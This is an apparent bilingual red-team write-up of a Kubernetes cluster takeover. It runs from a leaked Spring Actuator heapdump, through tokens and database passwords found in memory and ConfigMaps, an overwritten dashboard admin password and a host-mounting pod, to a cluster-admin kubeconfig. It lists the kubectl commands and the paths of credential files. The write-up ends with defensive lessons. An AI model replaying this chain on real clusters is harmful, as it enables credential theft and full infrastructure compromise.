内存泄漏导致集群接管 - mem leak cluster-admin leak

First Post: 2023-03-01
Last Update: 2025-02-28
Word Count: 4.5k
Read Time: 20min

英文部分为中文的翻译大部分由 chatgpt 辅助翻译。

Intro (Avalanche) - 千里之堤溃于蚁穴

很显然，安全性问题往往只取决于微小的瑕疵，这次文章当你完整阅读后你会发现你以为的常规操作，配置方法，或者很常见的代码实践，会导致如此大的安全性隐患。

Obviously, Some common security issue begins some little flaw. Finishing this blog, you will find that some usual operation, configuration, or programming practice will cause such hidden danger.

TL;DR - 摘要

Java mem dump 中云相关的凭据性泄漏包括但不限于 alibaba Client AKSK, Mysql Client, Redis Client,Kubernetes [API] Client 等

Java memory dumping with token leakage in the cloud (Spring cloud heap dump) e.g., Alibaba Client memory → Access Key Secret Key, MySQL Client → SQL account and password, Redis Client → password and get shell, Kubernetes API Client → Service account
内存分析等杂项技巧在渗透测试中的应用

Memory leakage is paired with memory analysis. There are real scenarios for some misc tricks in CTF.
RBAC 宽松，以及因此被滥用导致的信息泄漏与接管，包括但不限于可删减 pods 及其配置外部数据库地址及其账密云服务厂商 AKSK 凭据高权限特殊权限 JWT 凭据等

Loose RBAC can causing information leaks and takeovers by abusing configured rules.Not limited to the ability to delete pods and their configurations, access external database addresses and their account credentials, cloud service provider AKSK credentials, high privilege JWT token for other service, etc.
脆弱的 DevOps 服务器或面板例如面板不安全的密码存储方式以及失败的鉴权，以及没有有效的命名空间隔离

Vulnerable DevOps service and dashboard. For example, incorrect dashboard password storage and authentication failure. Also the failure of namespace isolation.
集群内部数据库对外开放，虽然这种行为通常来说不是什么严重的安全性问题，但是在一些信息泄漏的情况下，可以成为渗透至关重要的一部分。

Inner-Cluster Database Exposure. It’s most important part in pentest with cred leakage although this action isn’t always core

Attack Vectors - 攻击路径

En

graph TD;
    java_actuator_heapdump --> mem_analysis --> kubernetes_serviceaccount_token_RBAC_ConfigMaps
    api_server_exposure
    api_server_exposure & kubernetes_serviceaccount_token_RBAC_ConfigMaps --> configMaps
    configMaps --> database_secrets
    database_exposure 
    database_exposure & database_secrets --> devops_dashboard_backend_db
    devops_dashboard_backend_db --> add_or_change_admin_account --> devops_dashboard_takeover
    devops_dashboard_takeover --> watch_dashboard_self_serviceaccount --> kubernetes_serviceaccount_token_RBAC_NamespacedFullPriv
    kubernetes_serviceaccount_token_RBAC_NamespacedFullPriv & api_server_exposure --> create_AttackPod_mount_hostfs_/_at_master_container_escape
    --> get_cluster_admin_kubeconfig --> Takeover_Whole_Cluster

Zh

graph TD;
    Java执行器heapdump泄漏 --> 内存分析 --> kubernetes_serviceaccount_token权限是ConfigMaps
    apiserver暴露
    apiserver暴露 & kubernetes_serviceaccount_token权限是ConfigMaps --> configMaps
    configMaps --> 数据库高权限用户密码
    数据库端口暴露 
    数据库端口暴露 & 数据库高权限用户密码 --> 开发运维面板后端数据库
    开发运维面板后端数据库 --> 创建admin后门帐户或者修改admin帐户密码 --> 开发运维面板接管
    开发运维面板接管 --> 查看面板本身serviceaccount --> kubernetes_serviceaccount_token_当前命名空间所有权限
    kubernetes_serviceaccount_token_当前命名空间所有权限 & apiserver暴露 --> 创建AttackPod并挂载master节点hostfs的/目录后容器逃逸 --> 获取cluster-admin的kubeconfig --> 接管整个集群

Detail - 技术细节

EntryPoint - 入口 Heapdump

红队的进攻入口打点其实相当的重要。当然这里的入手点非常的简单啊。

The entry point of red team action is really important. But there are very simple at here.

由于对方使用了所谓的 api gateway 一类的东西，我们可以在某一个页面下访问到对方某个管理服务的 Spring actuator ，其中暴露了 heapdump 的接口，但是没有其他的 restart 一类可以直接导致 RCE 的接口。因此我们很快就可以拿到这个服务的堆内存导出。

The target site is guarded by an API gateway. And We can reach a Spring Actuator endpoint at an administrator service, which exposes the heap dump interface without other RCE directly interface as restart. Then We can easily get the heap memory dump.

Memory Analysis - 内存分析

我这里是直接使用的 MAT ，这是 JVM 内存性能分析的一款有效工具。

I’m using MAT that is a powerful tool of JVM memory performance analysis.

在分析中，我着重观察了几个敏感的凭据位置，通过搜索诸如 Client 对象和 Config 字段的对象，以及一些环境变量，来尝试获取对应的配置文件内容，密钥等信息。

Sensitive locations are inspected during my analysis. Searching the object with keywords like ‘Client’, ‘Config’ and some environment variables will show me the config file content and passwords information.

kubernetes service account 凭据可能会存在于 TokenFileAuthentication 的对象中在 okhttp 的每次请求中使用 getToken() 方法来拿到凭据

具体位置在 Kubernetes-Client/Java 项目中的这里

io/kubernetes/client/util/credentials/TokenFileAuthentication.java:71

因此我们可以得知在内存中存留的引用必然会在 heapdump 中暴露出这个对象的 Token。

Kubernetes service account credentials may exist in the object of TokenFileAuthentication, and the getToken() method is used in every request with okhttp to obtain credentials. The specific location can be found here in the Kubernetes-Client/Java project, and at line 71 in TokenFileAuthentication.java. Therefore, we know that the token of this object will inevitably be exposed in the heapdump due to the reference remaining in memory.

这里我发现了三个凭据和一些信息总结如下

I got 3 creds and some helpful tips as following.

使用了 k8s 集群并且为该 pod 配置了服务账号，我们可以获取到 token 和其中的命名空间

Target is Kubernetes Cluster and Configure this pod with service account. So we got the token and namespace.
集群内使用的是 Mysql 数据库同时得到了数据库凭据

Mysql is in the Cluster. So we got the cred.
集群有集群内 Redis。Redis Client 泄漏了密码

Cluster contains Redis. And Redis Client leak password.
Java net URI IP 一些对象泄漏了一些内部的 IP 尤其是 api server 所在的位置

Java net URI IP objects leak internal IPs, especially the apiserver location.

Let’s go Deep - 深入敌营

出于某种原因，我们可以直接的接触到对应的内网集群。虽然他在内网，但是内存中的一些内容的暴露以及 API gateway 处理不当在 http 响应中返回的 Backend-IP 头很轻松的可以让我知道具体的集群位置在哪里。

For some reason, We can directly access the internal clusters. Memory dump and HTTP Response Header Backend-IP (Caused by misconfiguration of API Gateway) are all pointed to the location of inner net cluster.

RBAC Breaching - RBAC 违规

先进行简单的连接性测试，确认对方的 API 控制端口是否是可达的。6443 通常是 kubernetes API server 的端点，简单的 curl 6443 端口（当你不进行端口扫描时）一般情况我们应该的得到的返回的特征主要如下。

Without scanning ports, it’s important to test connectivity by checking if the controller API endpoint is reachable. The API Server port in Kubernetes is typically open on port 6443. You can use the curl command to check connectivity on this port, and it should return a fingerprint as following.

在 -vvv 的情况下证书通常带有 kubernetes k3s 等字段 (https 请求)

When using -vvv flag, the certificate usually contains fields such as “kubernetes” or “k3s”. (https request)

在没有其他错误的时候，显示401 错误的 JSON

When there are no other errors present, a JSON response with a 401 error is displayed.

{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "Unauthorized",
  "reason": "Unauthorized",
  "code": 401
}

既然我们已经拥有了服务账号的 token ，简单的将这个设置为环境变量 SAJWT 的值之后，创建一个 kubectl 的别名 k

Now we got token of service account. Setting the token value (JWT) as env variable SAJWT and then creating an alias k of kubectl.

1 2	`export SAJWT="<ServiceAccountJWT>" alias k='kubectl --token=${SAJWT} --server=https://<target-api-server-ip>:6443 --insecure-skip-tls-verify=true'`

这样，我们就得到了一个简易的和 api server 交互的 CLI Client.

So we create cli client which can interact with the remote api server.

第一件事，就是检查我们所具有的权限。在这一阶段，我们不需要采用枚举不同的资源来确定是否存在对应的访问权限。一来是可能对资源的权限涵盖不全，二来我们或许无法枚举到额外的资源，诸如 CDR。

Firstly, we need to check what role and what access control we met. At this step, we should not enumerate different resources manually to verify if we can access it. One is that the role of resources is more than what you can cover. Next is we can’t get the external resources, e.g., CDR.

kubectl 提供了一个非常好用的方法来帮助你得到权限。这里可以参考一下不错的文档。Cloud-Hacktricks

kubectl provide a command for you to get the access control conditions. Refer this cool document. Cloud-Hacktricks

1	`k auth can-i --list=true <-n {namespace} [optional]>`

在经过上面的操作后，我们可以得知这个泄漏 token 具有 configMap 的全部权限。

Now we can found the leaked token has configMap full access as response from above command.

ConfigMaps Leak more - 配置文件泄漏一切

什么是 ConfigMap ？What’s the ConfigMap?

ConfigMap 通常是作为集群内配置进行统一管理的一种资源，常常会被用来存放数据库密码连接信息，在使用时通常是在程序中使用 k8s SDK 进行获取，也可以通过挂载将内容挂载进入文件的挂载点。 key 就是文件名，value 为文件内容。当然也可能会存在一些 AKSK

ConfigMap is kind of resource that manages cluster configurations. It used to store database password and connection information. Program use it via k8s SDK and mount point that mounted as static file system into containers. Data is kv maps, key is filename and value is file content. Sometime AKSK is included in it.

在当前权限的 token 的 configmap dump 中，我发现在对应命名空间的 ConfigMap 中配置了数据库的 root 密码。这里泄漏了超多部分的内容，包括一部分外部数据库（主从同步）的账户密码等。

I spent a long time on dumped configMap. Finally, I got the root password of the database in the cluster. There is leaking more data, which include the db password which used to back up from external database.

Admin is me - 我才是管理员

现在所有的线索目前都指向了数据库。但是 3306 尝试失败了。所以简单的进行一波端口的扫描，发现开放了 33306 端口。33306 极有可能是那个程序员为了偷懒或者方便而进行反向代理的内部数据库的端口。如果这个猜想是成立的，那么我们可以通过之前获得的数据库凭据进行一手连接。

All the clues so far point to the database. However, attempts to connect to port 3306 failed. So, a quick port scan was performed, and port 33306 was found to be open. It is highly likely that port 33306 is the internal database port for the reverse proxy that the programmer set up for convenience. If this assumption is correct, we can use the database credentials obtained earlier to establish a connection

我承认我有赌的成分在里边，因为在扫描和扫描之前我就猜测对方程序员存在偷懒的可能，即故意通过配置静态的端口暴露对数据库端口进行暴露。而 k8s 默认是不会将任何 Pod 端口进行暴露的。

I admit there is an element of gambling involved because I speculated before scanning that the other programmer may have been lazy and deliberately exposed the database port by configuring a static port before scanning. By default, k8s does not expose any pod ports.

另外端口扫描确实是动静比较大，所以在可以不进扫描的时候，我会尽量避免这个行为。毕竟渗透讲究的是一个微操。

Moreover, port scanning will create some noise in network traffic, so I try to avoid this behavior whenever possible. After all, penetration testing emphasizes fine-grained operations.

测试成功，这时候我们可以连接远程的数据库了，这时候我们是 root 权限的用户，拥有比先前内存转储中得到的凭据所有的权限都更全。

33306 test pass.Now we can access remote database. We are ROOT who has more privileges than memory dump one.

在多个数据库表中，我发现了一个存放有类似 kubernetes 面板的数据库，存放有类似 yaml 文件修改，执行 shell 类似字段的权限库，有类似权限绑定的绑定库，以及用户名密码的用户凭据库。

I found a db which is likely a backend of Kubernetes dashboard, stores privilege table that contain keywords like ‘YAML edit’, ‘shell exec’, stores role binding table, and credential table.

其中凭据表只有一行，也就是 admin 用户，经过 kali hash-identifier 工具的检查，大概确认是 sha256 后的密码，不过不确定是否加了盐。接着通过目录爆破和关键字搜索，我找到了面板的具体位置。

The credential table has 1 column, which is admin. After the Kali hash-identifier checking, the password is passhash after sha256. But I don’t know whether it is salted. By the way, Directory brute force and keyword searching gave me the location of the dashboard.

尝试爆破密码，但是跑完了整个 rockyou.txt 都没有跑出来这个密码，那多半不是什么弱密码了。于是另辟蹊径，在密码备份后，修改掉了 admin 的帐户密码，然后尝试创建一个 sha256 后用新密码进行登录，同时这一步也可以测试是否数据库密码进行了加盐。

Attempt to passhash brute forcing is fail with full rockyou.txt.So the password was likely not a weak password. I tried another approach, backup current password, password for the ‘admin’ account updated to a new sha256 hash of new password. Then, I used new password to attempt a login, also testing whether the database password was salted.

最后我们成功的登录上了 admin 的帐户。 Dashboard 管理还是很全的，例如执行 shell 和管理 pod 之类的功能。

Finally, we successfully logged in to the admin account. The Dashboard management has a wide range of functions, such as executing shell commands and managing pods.

Not the End - 还没结束

虽然我们已经通过这种方法拿下了部分集群的权限，只是一个 namespace 的全部权限但是没有整个集群的权限。因此我们还需要进一步的提升和巩固自己的权限。而 dashboard 本身具有的管理功能通常是通过其中配置的 serviceaccount 的权限。所以思路其实非常清晰，直接通过 shell 交互，找到面板自己的 service account 凭据，滥用凭据创建 pod ，pod 中挂载 host 下的 / 目录并且将 pod 指向到集群的 master 节点，拿下 master 上的 kubeconfig 文件。

Although we have gained some cluster permissions through this method, it is only full permissions for a single namespace and not the entire cluster. Therefore, we need to further escalate and consolidate our privileges. The management functions that the dashboard has are usually granted through the service account permissions configured within it. So the idea is clear - we can directly use shell interaction to find the dashboard’s service account credentials, abuse the credentials to create a pod, mount the host’s root directory within the pod, and then direct the pod to the master node of the cluster to obtain the kubeconfig file from the master node.

这一类技巧在 hacktricks-cloud 中有详细描述。而我优化了这一部分的攻击逻辑。增加了 node selector 这种指定 pod 调度到某个节点的操作。顺手给提了一个 PR hacktricks-cloud#7。(k8s 本身是随机选择合适的节点调度的，而 nodeSelector 可以保证调度到符合指定条件的节点，而我们所在的 k8s 集群，事后查看面板发现大约有七个节点。)

This kind of technique is described in detail in hacktricks-cloud. However, I optimized the attack logic in this section by adding node selector operations, which allow pods to be scheduled to specific nodes. I also submitted a PR for this improvement hacktricks-cloud#7. (Kubernetes itself schedules to appropriate nodes randomly, while nodeSelector ensures that it schedules to nodes that meet specified criteria. After takeovering whole cluster, we found that there are approximately seven nodes in this Kubernetes cluster.)

至于如何列出当前用户权限所有的凭据信息或者拿到 kubeconfig 文件，可以查看常见的文件点位，例如 /etc/kubernetes/admin.conf /etc/kubernetes/controller-manager.conf 以及 /etc/rancher/k3s/k3s.yaml 和 ~/.kube/xxxxx这类的文件，或是使用命令类似 kubectl config view --raw 。这里 hacktricks 文档并没有写，下次有空了，再交个 PR。

To list all the credentials information for the current user’s permissions or obtain the kubeconfig file, you can look for commonly used configuration files such as /etc/kubernetes/admin.conf, /etc/kubernetes/controller-manager.conf, /etc/rancher/k3s/k3s.yaml, and ~/.kube/xxxxx. Alternatively, you can use a command like kubectl config view --raw. This information is not currently included in the hacktricks documentation, but I can submit a PR for it when I have time.

Everything End - 尾声

接下来我们就可以把最高权限的 admin 帐户或是系统类最高权限帐户，导入我们的 Lens k9s 一类的 kubernetes 管理工具，进行持久化和管理，享受他们给你带来的便利。你懂的，一切的管理工具都可以是黑客工具。全都可以炸完！（可莉脸）

With the highest level of admin account or system-level privilege account, we can import them into our Kubernetes management tools like Lens or k9s for persistence and management, enjoying the convenience they bring us. You know, all management tools can be hacking tools. They can all be exploded! (Klee’s face)

Conclusion - 总结

查看整个渗透测试的路径和思路，你会发现这里只有三个非常重要的独立于其他的初始条件，一个是 java 的内存泄漏，这是一切的开始，第二个是 kubernetes 控制 api 可以控制，第三个是主动暴露出来的数据库端口。然而，这些条件大部分在很多开发者写的代码和实际集群的配置中非常的常见，往往却是最容易被忽视的。

If you look at the entire penetration testing path and approach, you will find that there are only three very important initial conditions that are independent of others. One is Java’s memory leak, which is the beginning of everything; the second is that the Kubernetes control API can be accessed; and the third is the actively exposed database port. However, these conditions are very common in the code written by many developers and the actual cluster configuration, and they are often the easiest to be overlooked.

当然这一整个集群最为核心的问题在于 dashboard。dashboard 数据库的配置存放于 configmap 中，而 configmap 是可以直接被具有 configmap 权限的 service account 读取的，而 spring cloud app 通常会具有该权限。又由于错误地把 dashboard 部署在了生产 namespace，导致 dashboard configmap 混合在其他生产 configmap 中，从而使得攻击者可以完成一套从内存泄漏到 cluster-admin 接管的完整攻击链。多种缺陷综合在一起导致了这一次的严重的安全问题。

The core problem with the entire cluster lies in the dashboard. The configuration of the dashboard database is stored in a configmap, which can be directly read by a service account with configmap permissions, which is often owned by a spring cloud application. Due to the error of deploying the dashboard in the production namespace, the dashboard configmap is mixed with other production configmaps, allowing attackers to complete a complete attack chain from memory leaks to cluster-admin takeover. Multiple deficiencies combined to create this serious security problem.

Take care of your cluster, and be well. 👆😎